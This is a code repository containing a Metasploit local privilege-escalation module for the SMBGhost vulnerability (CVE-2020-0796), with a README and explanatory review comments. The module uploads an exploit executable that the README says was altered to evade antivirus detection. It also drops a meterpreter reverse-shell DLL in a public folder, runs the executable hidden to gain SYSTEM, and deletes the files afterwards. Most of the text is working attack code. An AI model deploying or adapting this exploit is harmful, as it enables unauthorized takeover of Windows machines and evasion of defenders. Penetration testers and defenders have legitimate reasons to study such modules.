├── README.md ├── cve_2020_0796_payload.exe ├── demo.gif └── smbghost_PrivEsc.rb /README.md: -------------------------------------------------------------------------------- 1 | # SMBGhost-LPE-Metasploit-Module 2 | This is an implementation of the CVE-2020-0796 (aka SMBGhost) vulnerability, compatible with the Metasploit Framework 3 | 4 | # Notes: 5 | - This module is made to be used when you already have a valid shell, to escalate your privileges. 6 | - You can change the payload if you want to use your own DLL shellcode or if you want to encode it in some way. 7 | - The exe file is edited to evade detection and made applicable to run and inject the DLL shellcode. 8 | 9 | # Demo 10 | ![](demo.gif) 11 | 12 | # Credits 13 | - Credits for the exploit authors {Daniel García Gutiérrez, Manuel Blanco Parajón}. 14 | - Credits also to Spencer McIntyre for his great code. 15 | 16 | # References 17 | - https://github.com/danigargu/CVE-2020-0796 18 | - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005 19 | - https://github.com/Almorabea/SMBGhost-WorkaroundApplier 20 | -------------------------------------------------------------------------------- /cve_2020_0796_payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Almorabea/SMBGhost-LPE-Metasploit-Module/8f5dc0de4e9f44db64059c6f376bd6445b86a942/cve_2020_0796_payload.exe -------------------------------------------------------------------------------- /demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Almorabea/SMBGhost-LPE-Metasploit-Module/8f5dc0de4e9f44db64059c6f376bd6445b86a942/demo.gif -------------------------------------------------------------------------------- /smbghost_PrivEsc.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This is an implementation of CVE-2020-0796 aka SMBGhost.
# This module is made to be used when you already have a valid shell, to escalate your privileges.
# Credits for the exploit authors {Daniel García Gutiérrez, Manuel Blanco Parajón}.
# Credits also to Spencer McIntyre for his great code.
# Note:
# - You can change the payload if you want to use your own DLL shellcode or if you want to encode it in some way.
# - The exe file is edited to evade detection and made applicable to run and inject the DLL shellcode.
# Author of this module: Ahmad Almorabea @almorabea
#
# What this file does, as visible in the code below: `check` gates on the session
# host's OS string, build number and the LanmanServer DisableCompression registry
# value; `exploit` uploads a prebuilt executable (cve_2020_0796_payload.exe,
# shipped next to this file) and a freshly generated payload DLL to the session
# host, starts the executable, and then deletes both uploaded files. The actual
# vulnerability trigger lives inside the executable, not in this Ruby code.
##
require 'msf/core/payload_generator'

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  # NOTE(review): ReflectiveDLLInjection is mixed in but none of its methods are
  # called in the visible code; the DLL is handed to the uploaded exe instead.
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Exploit::Remote::AutoCheck
  # presumably provides generate_payload_dll used in `exploit` — verify against the framework version in use
  include Msf::Exploit::EXE

  # Module metadata. Only one target (Windows 10 1903/1909 x64) is declared, and
  # the Notes mark the exploit as able to crash the OS (CRASH_OS_RESTARTS) —
  # relevant for anyone assessing the blast radius of running it.
  #
  # @param info [Hash] metadata overrides passed through to Msf::Exploit::Local
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'SMBv3 Compression Integer Buffer Overflow',
          'Note' => 'We used dll in this modue to be injected, and run through Rundll32',
          'Description' => %q{
            A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to
            execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself
            before injecting a payload into winlogon.exe.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Ahmad Almorabea' # metasploit module
          ],
          'Arch' => [ ARCH_X64 ],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'thread',
              'Format' => 'dll'
            },
          'Targets' =>
            [
              [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]
            ],
          'Payload' =>
            {
              'DisableNops' => true,
              'Format' => 'dll',
              'Platform' => 'win',
              # NOTE(review): this is the string 'ARCH_X64', not the ARCH_X64
              # constant used everywhere else in this file — confirm intended.
              'Arch' =>'ARCH_X64',
              'payload' => 'windows/meterpreter/reverse_tcp'
            },
          'References' =>
            [
              [ 'CVE', '2020-0796' ],
              [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],
              [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]
            ],
          'DisclosureDate' => '2020-03-13',
          'DefaultTarget' => 0,
          'AKA' => [ 'SMBGhost', 'CoronaBlue'],
          'Notes' =>
            {
              'Stability' => [ CRASH_OS_RESTARTS, ],
              'Reliability' => [ REPEATABLE_SESSION, ]
            }
        }
      )
    )
  end

  # Vulnerability check driven entirely by sysinfo and one registry value.
  #
  # Returns CheckCode::Safe when the OS string does not contain "windows",
  # when the parsed build number is outside 18362..18363 (or the OS string has
  # no "10"), or when the DisableCompression value under
  # HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters is present
  # and non-zero (the Microsoft ADV200005 workaround). Otherwise returns
  # CheckCode::Appears.
  #
  # Limitations visible here: nothing checks whether the host is actually
  # patched, so a fully updated 18362/18363 build with compression enabled still
  # reports Appears; the check is "looks like an affected build", not
  # "confirmed vulnerable".
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    sysinfo_value = sysinfo['OS']

    if sysinfo_value !~ /windows/i
      return Exploit::CheckCode::Safe
    end

    # [0] is the whole match, not capture group 1: the first run of word
    # characters of the form <word><digits><word><digits> is taken as the build
    # number. NOTE(review): `match` returns nil when no such run exists, which
    # would raise NoMethodError here rather than return Safe — confirm against
    # the OS strings Meterpreter actually reports.
    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
    vprint_status("Windows Build Number = #{build_num}")

    # 18362 = Windows 10 1903, 18363 = Windows 10 1909 (the only declared target).
    unless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363)
      print_error('The exploit only supports Windows 10 versions 1903 - 1909')
      return CheckCode::Safe
    end

    # A non-zero DisableCompression value means the documented workaround is
    # applied; a missing value is treated the same as 0 (compression enabled).
    disable_compression = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters', 'DisableCompression')
    if !disable_compression.nil? && disable_compression != 0
      print_error('The exploit requires compression to be enabled')
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  # Runs the escalation. Sequence as written: refuse if already SYSTEM or on a
  # WOW64 / architecture-mismatched session; upload the bundled executable into
  # the session's current working directory (relative path); write the generated
  # payload DLL to log.dll beside this module on the Metasploit host and upload
  # it to c:/Users/Public/shell.dll; start the executable hidden; delete both
  # uploaded files; report.
  #
  # Host-side artifacts a responder would see: a file named
  # cve_2020_0796_payload.exe in the session's working directory and
  # c:/Users/Public/shell.dll, both short-lived (removed right after the process
  # is started), plus the hidden process itself. The local log.dll on the
  # operator's machine is never cleaned up.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on the guard checks above
  def exploit
    super

    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    if sysinfo['Architecture'] =~ /wow64/i
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    print_status('Starting process in the victim machine...')

    print_status("Preparing exploit in the victim machine ...")
    # The executable is read from the same directory as this .rb file.
    exploit_path = ::File.join(File.dirname(__FILE__), 'cve_2020_0796_payload.exe')

    # Destination is a bare filename, so it lands in the session's current
    # working directory, whatever that happens to be.
    upload_file("cve_2020_0796_payload.exe",exploit_path)

    print_status("Preparing Shellcode to be injected...")

    # The payload DLL is materialised on disk locally before upload; the local
    # copy (log.dll next to this module) is not removed afterwards.
    encoded_payload = generate_payload_dll(code: payload.generate)
    File.open(__dir__+"/log.dll", "w+") { |f| f.write encoded_payload }

    library_path = ::File.join(File.dirname(__FILE__), 'log.dll')
    #library_path = ::File.expand_path(library_path)

    # Hard-coded, world-readable drop location on the session host.
    upload_file("c:/Users/Public/shell.dll",library_path)

    print_status("Injecting exploit...")

    # Status text only; any kernel-address leak happens inside the uploaded
    # executable, which this code does not observe.
    print_status("Leaking Kernal Address..")

    exploit_process = client.sys.process.execute('cve_2020_0796_payload.exe', nil, { 'Hidden' => true })

    print_status("Exploit injected...")

    # pid / handle / channel are printed for the operator but not used further.
    print_status("Retrieving Exploit pid #{exploit_process.pid}...")

    print_status("Retrieving Exploit handle #{exploit_process.handle}...")

    print_status("Retrieving Exploit Channel #{exploit_process.channel}...")

    # Cleanup is issued immediately after execute() returns; there is no wait on
    # the process, so whether the exe has finished reading shell.dll at this
    # point is not something the code guarantees.
    rm_f('cve_2020_0796_payload.exe')
    rm_f('c:/Users/Public/shell.dll')

    print_status('Payload injected. Executing exploit...')

    print_good('Exploit finished, wait for payload execution to complete. if not! it could be stopped by WinDefend or a firewall')
  end

end